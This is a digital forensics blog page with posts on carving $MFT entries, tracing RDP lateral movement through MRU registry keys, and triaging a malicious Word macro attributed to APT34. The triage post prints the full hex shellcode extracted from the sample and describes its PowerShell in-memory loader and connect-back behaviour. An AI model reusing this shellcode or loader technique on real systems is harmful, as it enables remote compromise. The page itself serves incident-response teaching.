Carving $MFT (MFTEntryCarver.py)

Another story on how you might discover new artifacts to help your investigation – MFT Carving.

It’ been some time since I wrote my last blog post. Like every year, the last quarter is very busy. Still I got something new I want to share. This week I have been teaching SANS FOR 508 with Francesco Picasso @dfirfpi in Paris. When Francesco talked about $MFT entries, I was curious where on a drive single $MFT entries or groups of MFT entries might end up other than the currently active $MFT. I briefly googled if there are solutions that support carving single, potentially corrupted $MFT entries and couldn’t find any. There are many solutions which parse a complete and active $MFT and solutions which carve files, but that’s not was I was looking for. So back in my room I started to do some research.

As the $MFT is literally filled up with timestamps I figured it might come handy to have a MFT-Carver-Parser that also handles half corrupted MFT entries. If you just want to get the tool I wrote to do that and not read the whole blogpost, feel free to download it at https://github.com/cyb3rfox/MFTEntryCarver/

As pointed out, I did not expect to find many entries in unallocated space, but I gave it a try anyhow. First of all, I dumped the unallocated space of a test Windows 7 image using sleuthkit’s blkls.

blkls image.ewf > unallocated.blocks

This produced a file around 7Gb big. To see if it would even make sense to start writing something, I just did a strings search on the file.

strings -a unallocated.blocks | grep FILE0 | wc -l
Counting potential number of $MFT entires

Note that basically FILE (\x46\x49\x4C\x45) is the header for an entry, but not using it will give you many strings that are part of textfiles and script. Still most not to say all entries start like FILE0 (\x46\x49\x4C\x45\x30). \0x30 declares the offset to the fixup and that is usually the same for many of the files. And as it represents 0 in ASCII it’s easy to grep. Anyway, the above command leads to the following output.

So it looks like we have 5026 potential $MFT entries. Next, I wanted to understand, how those artifacts are distributed across the dump file. Hence, I searched for the magic bytes again, only this time, I also got the offset of the hits.

strings -a -t d unallocated.blocks | grep FILE0
Figuring out the entry offset for plotting

I then grouped the hit offsets into a manageable number of buckets and plotted a histogram.

Histogram of $MFT entries in the dumped unallocated space

The histogram shows, that not all of those entries are clustered in one place but in at least 3 separate locations (there are some less populated sections that don’t show on the graph).
That implies, that the entries might be coming from different sources. Interesting enough for me to start writing a little tool. The $MFT is very well documented. I used two resources to understand what I needed to do.

I guess this is the time to point out, that I’m obviously not a full time coder and python is quite new to me. If you don’t believe me, look at the code and you see what I mean. So please excuse my spaghetti code. In the end, it works and is even reasonably fast.

I wanted the tool to be able to do the following things:

  • Find potential file entries
  • parse as many of their $FN attributes (long and short) as possible
  • parse $STDInfo and $FN Timestamps
  • For resident $data attributes, recover the data as well
  • still work if half of the information is corrupted
  • output all in csv format

So, first of all, I needed to find all potential $MFT entries. As the input files for this kind of tool can get quite big, using methods that need to put the whole file into memory might fail. In the end, I decided to use the python mmap library. It’s fast and you can open really big files and move a pointer over the data. Also searching for hex patterns is supported.

The pattern search for FILE (\x46\x49\x4C\x45) returned 54583 potential entries. So how do I decide which are legitimate ones and which are false positives? My approach was to try and parse further attributes and sanity check the results as good as possible. So, for example, I use size checks a lot. All attributes in $MFT entries store their size. I parse that and if the parsed value is smaller than the minimum size of the attribute or bigger than the size of the whole entry, the bytes I parsed are probably not part of a real $MFT entry. I don’t want to go into that too deeply, please look at the code if you want to understand my approach. Suggestions and contributions are highly welcome.

So after a couple of hours of work, I get to the following results.

python MFTEntryCarver.py -s unallocated.blocks
MFTEntryCarver.py output -s flag shows statistics in the end

So essentially. MFTEntryCarver.py will give you all the artifacts mentioned above if it can find them. It only keeps on parsing when it finds at least one valid $FN attribute. If certain artifacts are not there, it will put in “corrupted” in the respective field. Below are the statistics the tools shows after processing the test dataset.

The good news here, in the end, there were not only 5026 entries to parse but a total of 54583. Out of those MFTEntryCarver.py recovered 14975 entries. So let’s take a look at one of the entries.

[u'GETWIN~1.URL', u'Get Windows Live.url'];2010-11-10 08:22:22.646273;2010-11-10 08:22:22.646273;2010-11-10 08:22:22.646273;2010-11-10 08:22:22.646273;1601-01-01 00:00:00;1601-01-01 00:00:00;1601-01-01 00:00:00;1601-01-01 00:00:00;0d0a50726f70333d31392c320d0a5b496e7465726e657453686f72746375745d0d0a55524c3d3c0174703a2f2f676f2e6d6963726f736f66742e636f6d2f66776c696e6b2f3f4c696e6b49643d36393137320d0a49444c6973743d0d0a794711

So, in this case, we found a .URL file called “Get Windows Live.url” and the data seems to resident. Some timestamps couldn’t be parsed, MFTEntryCarver.py still gets you as much as it can. I usually transform and analyze raw hex data using CyberChef. Throwing the hex contents of the resident data attribute at it produces readable results (at least for ascii characters).

CyberChef can parse the resident data

I’ll try the tool some more in investigations, but it looks promising. offers a viable way to get older $MFT entries, including timestamps. Artifacts like these usually help an investigation when the attacker cleaned up and/or is long gone. If you use it, please give some feedback. You can easily reach out to me on twitter @mathias_fuchs. You can get the code at https://github.com/cyb3rfox/MFTEntryCarver

Quick Office Document Triage

As people quite frequently ask me how I triage potentially malicious Microsoft Office documents, I decided to run through a quick analysis here. 

Our specimen for that tutorial is a word document out of the malware collection published by @0xffff0800 on http://iec56w4ibovnb4wc.onion (URL might change. Check current address at 0day.coffee)@0xffff0800 attributes the file to an Iranian Threat actor dubbed APT34 by Mandiant/FireEye. You can download the file  directly from the repository or Virus Total (https://www.virustotal.com/#/file/db53b4157868fffd0331c1498e2209c11499b14f5aa980fe4fb3453858ed90b5/detection)

Specimen Details

FilenameMagicHoundAPT34.doc
SHA19ff035e1d7517ac3c081a1a25382fa862dd1f87d
Size39’936 b
This is how the file looks like when you open it in Word (Don’t do it, but if you really have to don’t enable Macros 😜)

As you can see, they didn’t really care about crafting a nicer fake document. I trust, your red-team does better than that.

Triage vs. Full Analysis 

The main goal of a triage is to allow a medium experienced Forensic analyst who probably has no background in malware reverse engineering to figure out if a document is malicious and even get some IOCs out of it. The approach I’m suggesting here is a low-risk approach as it works completely without opening the file in Microsoft Word or executing any PowerShell code. For the sake of completeness, I’ll give some hints on how a Malware Analyst could continue dissecting the malware. 

Tools used

1.) Finding the Macro

We are looking at an old Word Document format as indicated by the .doc suffix. Those documents are stored in the OLECF  file format (further reading). Oledump is a nice tool written in python that allows you to extract various streams contained in the olecf file. So let’s take a closer look at the file and see if it is even malicious.

oledump.py MagicHoundAPT34.doc 

This will scan the file for all subelements in the compound file. For the given specimen it shows the following output. Note the stream number 7. This is the only stream that contains a macro.

Scanning the document

Oledump offers a fast and easy way to extract individual streams. As macros are usually compressed, we need the -v flag as well to decompress the content.

Stream 7 in uncompressed form

Looking at the macro, what we see are typical Powershell parameters and a lot base64 encoded sections. Let’s dump the macro in a separate file to look at it more closely.

oledump.py -s7 -v MagicHoundAPT34.doc > macro.txt 

2.) Revealing the actual code

Looking at the macro in the Texteditor of your choice (I use Sublime), preferably one that supports syntax highlighting we see that the main payload seems to be PowerShell based, and the vb macro only executes PowerShell and shows an error message.

powershell.exe  called using the vb Shell command

So apparently we need to decode the base64 Powershell source next. You probably realized that it is not a single string block, but multiple concatenated string blocks. So we need to clean that up a bit and then decode it into a new file called base64.txt 

Mac OS:
base64 -D base64.txt > powershell1.txt
Most Linux:
base64 -d base64.txt > powershell1.txt

That gives us an interesting piece of PowerShell code. At first, we see, that there seems to be some additional PowerShell code in a string variable called $G8t. at the end of the file, that same Powershell code gets base64 encoded again and then executed with the 32-bit version of PowerShell (Note the location of powershell.exe in a subfolder of syswow64). A very common reason to use 32-bit binaries is when the attacker happens to have 32-bit shellcode he wants to execute. This code wouldn’t run using 64-bit binaries. So let’s look for some shellcode. I’m sure you spotted it already. The variable called $z is an array of byte values. If you look at the code more closely you see, that the attacker leverages the memset function to write the shellcode bytewise into memory he allocated using VirtualAlloc. The malware seems to be flexible when it loads shellcode. Normally it allocates $g bytes which would be 1000 bytes. If the shellcode us longer it changes $g to reflect the actual size of the shellcode.

PowerShell code in powershell1.txt

For an incident responder with no malware analysis background, that would be the right moment to hand the sample over to a malware analyst. 

3.) Extracting and analysing the shellcode 

If you don’t know what shellcode is, Wikipedia has an easy to read article on that topic. So lets get out the shellcode in hex first. It looks like this.

0xba,0xf7,0xc6,0x4e,0x03,0xd9,0xeb,0xd9,0x74,0x24,0xf4,0x58,0x31,0xc9,0xb1,0x47,0x31,0x50,0x13,0x03,0x50,0x13,0x83,0xe8,0x0b,0x24,0xbb,0xff,0x1b,0x2b,0x44,0x00,0xdb,0x4c,0xcc,0xe5,0xea,0x4c,0xaa,0x6e,0x5c,0x7d,0xb8,0x23,0x50,0xf6,0xec,0xd7,0xe3,0x7a,0x39,0xd7,0x44,0x30,0x1f,0xd6,0x55,0x69,0x63,0x79,0xd5,0x70,0xb0,0x59,0xe4,0xba,0xc5,0x98,0x21,0xa6,0x24,0xc8,0xfa,0xac,0x9b,0xfd,0x8f,0xf9,0x27,0x75,0xc3,0xec,0x2f,0x6a,0x93,0x0f,0x01,0x3d,0xa8,0x49,0x81,0xbf,0x7d,0xe2,0x88,0xa7,0x62,0xcf,0x43,0x53,0x50,0xbb,0x55,0xb5,0xa9,0x44,0xf9,0xf8,0x06,0xb7,0x03,0x3c,0xa0,0x28,0x76,0x34,0xd3,0xd5,0x81,0x83,0xae,0x01,0x07,0x10,0x08,0xc1,0xbf,0xfc,0xa9,0x06,0x59,0x76,0xa5,0xe3,0x2d,0xd0,0xa9,0xf2,0xe2,0x6a,0xd5,0x7f,0x05,0xbd,0x5c,0x3b,0x22,0x19,0x05,0x9f,0x4b,0x38,0xe3,0x4e,0x73,0x5a,0x4c,0x2e,0xd1,0x10,0x60,0x3b,0x68,0x7b,0xec,0x88,0x41,0x84,0xec,0x86,0xd2,0xf7,0xde,0x09,0x49,0x90,0x52,0xc1,0x57,0x67,0x95,0xf8,0x20,0xf7,0x68,0x03,0x51,0xd1,0xae,0x57,0x01,0x49,0x07,0xd8,0xca,0x89,0xa8,0x0d,0x66,0x8f,0x3e,0x6e,0xdf,0x85,0xac,0x06,0x22,0x9a,0xc5,0x65,0xab,0x7c,0xb5,0xd9,0xfc,0xd0,0x75,0x8a,0xbc,0x80,0x1d,0xc0,0x32,0xfe,0x3d,0xeb,0x98,0x97,0xd7,0x04,0x75,0xcf,0x4f,0xbc,0xdc,0x9b,0xee,0x41,0xcb,0xe1,0x30,0xc9,0xf8,0x16,0xfe,0x3a,0x74,0x05,0x96,0xca,0xc3,0x77,0x30,0xd4,0xf9,0x12,0xbc,0x40,0x06,0xb5,0xeb,0xfc,0x04,0xe0,0xdb,0xa2,0xf7,0xc7,0x50,0x6a,0x62,0xa8,0x0e,0x93,0x62,0x28,0xce,0xc5,0xe8,0x28,0xa6,0xb1,0x48,0x7b,0xd3,0xbd,0x44,0xef,0x48,0x28,0x67,0x46,0x3d,0xfb,0x0f,0x64,0x18,0xcb,0x8f,0x97,0x4f,0xcd,0xec,0x41,0xa9,0xbb,0x1c,0x52

I want to use CyberChef to create a binary file out of the shellcode. For that to work, I either need to get rid of all the 0x or the commas as CyberChef only accepts one separator.  I’ll get rid of the commas and paste it into CyberChef’s input window. Selecting the “From HEX” recipe gives me some gibberish characters in the output window. That’s exactly how machine code is supposed to look like in ASCII. So let’s save that to a file by clicking on the save icon. I choose shellcode.bin.

Creating binary shellcode from the HEX string

So now that we got the shellcode, what do we do next? Shellcode is not a complete binary. It usually uses functions provided by the operating system, in that case, windows to do whatever it needs to do. We have two options now. We do have way more than one option to run it anyhow. For a first glance, I’ll use a tool called scdbg. It allows us to run shellcode without first putting it into a complete windows executable. The downside of this is, that we can’t really debug it from there. One note, if you do the same thing, be aware that scdbg actually executes the code. This can definitely harm your system. So let’s see if we can get it to run.

Shellcode loaded into scdbg
Results after running the shellcode through scdbg

Ok, so now we know a bit more about the shellcode. It seems to leverage a WSASocket to open a connection to a local IP address on port 5555. This IP is not in the subnet of the analysis workstation so there is no way it would get a response. So wouldn’t it be nice if we could look at what it is trying to do there more closely? I guess it is worth a try. There is a nice little tool written by Adam Kramer that can help us out. It is called jmp2it. It allows us to debug the shellcode. But that’s already way beyond simple malware triage for Incident Responders. I’ll put up a separate blog entry on how to proceed with that sample as soon as I have time. So happy hunting and have a great weekend.

Attackers and RDP MRUs

Now I finally got the time to continue with mapping the data out of my Tanium RDP MRU Sensor.

But first a couple of things. Two people responded to my last Blog entry and pointed me at the HKEY_Users hive (HKU) to get my data easier. And they are partly right. The HKU holds the ntuser.dat content for all active users. The problem is, active users means actively logged on user. So for my scenario, investigating lateral RDP movement this will not be enough. So long story short, you’ll still need some coding if you want to get all the information.

Today I acquired some data from a testnetwork at my workplace using Tanium. As it is Sunday it contains only a small subset of the machines which are usually there. So the dataset contains mostly servers, including a fair share of jumpservers. So it’s actually a good dataset to start with.

My test dataset

My theory is, that if an attacker uses a known account or probably even an account created by the attacker, we should be able to follow his trail through the network. What I’m looking at is something like this.

Expected outcome

Creating a Graph like that would require me to have source, destination and username for an RDP MRU. That’s nice because I have that already as CSV exported out of my Tanium Sensor results. To see something that looks like attack I added some fake Data into the mix. Essentially someone using an account called attacker who jumps from a notebook to a jumpserver, from there to another server and yet another server and so on, you get the idea. I also assume, that I’ll definitely discover some logon habits of the people on the testsystems.

Once the data is ready, the question is how to filter it, plot it and do that all over again to support dynamic analysis. After some search I decided to start with an existing tool rather than building something. The tool I choose is Gephi (https://gephi.org) which is a very well known graphing software in data sciences. The best of all, it’s free.

So I had to figure out how that tool works. After investing an hour on it I got pretty much the result I wanted to have.

Plotting the full dataset

The first thing I checked out was the most active user in the dataset. The data immediately shows typical administrative behavior – quite disciplined though. looking up the username it is indeed an administrator. So even if the data looked chaotic at first, graphing it did allow to draw conclusions.
For obvious reasons I had to remove the node names (hostnames) from the picture. But the Two central nodes are jumpservers, thus being the target for connections from this user. The more remote nodes are servers the Admin jumped to using the jumpserver. The fat line between the two jumpservers indicates the administrator used both of his accounts to move between the servers in both directions which is perfectly in line with the policy.

Normal admin

So let’s see how a simulated attack vector looks like. My assumption here is, that the attacker used an account that never uses RDP normally or an account he created himself for lateral movement. Thus filtering for the username in the dataset will only show the adversary moving. If the attacker uses more than one account, it’s perfectly possible and even quite easy to plot all the action in one run.

Simulated attacker

I’m quite happy with the results and plan to give it a shot in a bigger, real network. That opens up a new way of hunting to me, so I guess it was worth the while. There are some additional things I need to mention. First and foremost finding the attackers targets works in any case if he uses RDP for lateral movement and you are able to differentiate between legitimate users and attackers. In the worst case you need to check with the owner of the compromised account which hosts he usually accesess using RDP and filter those out.
Having said that, there is a limitaion in some networks. As soon as roaming profiles are used widely, the ntuser.dat of the users will be roamed as well. This means that the source for the MRUs is not necessarily the machine the entry was added to the registry. In this case real step-by-step tracking does not work anymore. Secondly there is almost no timing aspect to that data. You can usually deduct which move came first, but not when. In that case you would need to leverage eventlogs if they have not rolled already (which they most likely have as you’d have used them if you could in a first place). The huge advantage is that the data I leveraged here stays on the system for very long. I remember the profiles of some admins still being present on my company notebook after I was in the company for several years. Those guys had already left the company by then.

So to summarize, RDP MRUs are a great way to track lateral movement using RDP even a long time after the attacker has left. It does not work as well when profiles are roaming but still gives some value in that case. If you have any questions just ping me on twitter @mathias_fuchs.

Agent based EDR and HKCU

One day I took my red SANS poster out (link) and figured it might be a good idea to acquire one or the other artifact using an EDR – in our case Tanium. I was particularly interested in getting RDP MRUs out of the registry. That’s when the struggle began.

So what are RDP MRUs. Sorry, not gonna explain what RDP stands for, but MRU usually stands for Most Recently Used. Did you ever ask yourself how windows or more correctly mstsc.exe – the RDP client distributed with Windows stores the information it propagates it’s address drop-down menu with? We’ll no surprise here – it’s a registry key. As the servers people connect to are usually something you don’t necessarily want to share with every other user on a system (particularly not on a jumphost) those specifically keys are stored in the user-specific portion of the registry – HKCU or HKEY_CURRENT_USER.

 

As soon as a user logs in, Windows propagates the HKCU branch with the contents of the individuals NTUser.dat hive file. So on a terminal server with many parallel sessions, HKCU is different for every user. So far so good – isn’t it. Well yes, it is for the user, but not so much for the incident responder. This whole process makes every HKCU based artifact a very dynamic concept. Let’s invest some time to figure out how to leverage that quite dynamic concept.

So from the start. The RDP MRUs are stored at HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default using the values MRU0 MRU<x> depending on how many historical RDP servers are stored.

 

As depicted above it’s quite easy to access this data from in an establishes interactive session (sounds sophisticated, just means logged on to explorer gui). But what if you want to access the MRUs from an agent on that system, and maybe the MRUs of all users? Well then it’s a different story. The typical agent based endpoint solutions run with SYSTEM privileges. SYSTEM is the highest privileged user on Windows systems – it’s not the typical kind of user though.

If you access the registry, namely the HKCU branch in a SYSTEM context, it seems not to be there (e.g. using the Tanium Get Registry Value Sensor). The same sensor works just fine for HKLM entries (HKEY_LOCAL_MACHINE). Crap. So what do I do now? Well actually it’s not surprising that I don’t get a lot of results using that sensor. HKCU is a very private affair, and how would Windows know which specific HKCU or in other words NTUser.dat I’m interested in.

So back to the drawing board. What I need the agent to do is something like the following steps:

  1. Figure out how many and which NTUser.dat files exist on the system
  2. Load them into a temporary key under HKLM
  3. Address the desired HKCU key within the temporary key
  4. Rinse and Repeat

As the solution I wanted that to work on is Tanium. I’m kind of limited to VB-Script, Powershell or WMI – newer versions will support python as well. I’m not so much into either of those languages (besides python, but most of our customers just haven’t that rolled out yet). So I figure that google was still my friend and could give me all the answers I was looking for. And frankly, it did, but it did so very reluctantly – or I was just tired and couldn’t find a good search term.

I ended up on a GitHub repo where someone needed to write some values in all NTUser.dat hives on a machine. That sounded like a good basis to start my sensor. Essentially it follows exactly the steps I drew up above. So the only thing I needed to do was changing the write operations to read operations and integrate everything into a Tanium sensor. If you want to implement that into whatever solution you use, the base code is here (https://github.com/micksmix/RegUpdateAllUsers/blob/master/RegUpdateAllHkcuHkcr)

This principle works for all keys under HKCU thus giving you a whole lot of useful, sometimes even stackable results. Stay tuned for the next post where I’ll explain what you can do with RDP MRUs when an attacker goes native in an APT3 style (aka doesn’t use malware to pivot)

Another DFIR Blog? Really?

WHY ?

I’ve not been maintaining a blog for quite some time know. So why do I feel that ti now makes sense to start over again. Well, first and foremost whenever I develop new fancy threat detection mechanisms and strategies or run incident response engagements in my day job, or when I’m teaching SANS classes around the world people tell me cool stuff that makes me better in what I am doing. Now it’s time to contribute more to the community, give back what the community gave and still gives to me.

WHAT ?

I’m not sure yet how that’s gonna turn out, but in the end I want to be able to point my customers and my students to my blog when they ask my what the hack I’m doing all day long. I also want to incubate and conserve ideas here. Right now I do have ideas for maybe my first 3-4 blog entries. I want to keep those entries technical, make whatever I describe usable to others. The DFIR community is a great community and I’m proud to be in a position to contribute at least a little bit to it.

WHO ?

So my full name is Mathias Fuchs, I’d rather go by the name of Mat (yes just one t – like in my full name). My current day job is building Cyberdefence Center in it’s own league together with awesome colleagues. My office is in Switzerland but I still live in Austria and commute on a weekly basis.

Besides that I teach the Advanced Incident Response and Threat Hunting” class for SANS (www.sans.org). I love it to travel to conferences and meet the best of the best – learn from them and maybe also help them to become even better incident responders.

 

If you have any questions, don’t hesitate to ping me on twitter, via mail or wherever you can find me. If you look to the right, you see where I’m currently at if I’m at conferences.

 

Copyright Cyberfox 2021
Tech Nerd theme designed by Siteturner
Secured By miniOrange